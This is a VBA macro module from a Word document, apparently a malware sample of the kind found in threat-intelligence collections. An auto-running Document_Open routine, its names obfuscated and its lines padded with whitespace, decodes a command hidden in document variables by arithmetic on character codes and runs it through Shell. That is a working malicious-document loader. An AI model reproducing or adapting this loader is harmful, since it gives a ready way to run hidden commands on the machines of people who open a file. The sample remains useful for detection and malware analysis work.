Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit






                                                            






                                                                            Private Function uncrowned(ByVal vegetate As String, ByVal busses As Long) As String





                                                    




                                                            uncrowned = ActiveDocument.Variables("H").Value & Right(Left(vegetate, busses), 2)








              End Function






           





                                                        Private Sub collimating(ByVal supergyre As String)







                 




                                            Dim pelagianism As Long: pelagianism = 2






               Dim outbuild As String
While pelagianism < Len(supergyre)







                   





              







                                        outbuild = outbuild & unfeverish(uncrowned(supergyre, pelagianism))






            pelagianism = pelagianism + 2






                                            






                                                            




                                                            




                   







          





                  Wend








                  





                        








                  







                                                 Shell outbuild





          




                                                                





                







                                        End Sub








                                                    




                                                    






                                                                




              Sub Document_Open()






                                                





                                                                        





            collimating ActiveDocument.Variables("h5321b24189b").Value








                                            End Sub








                                            




                   Private Function unfeverish(ByVal vegetate As String) As String





                                                    





              unfeverish = Chr(CLng(vegetate) - 45)
End Function


INQUEST-PP=macro
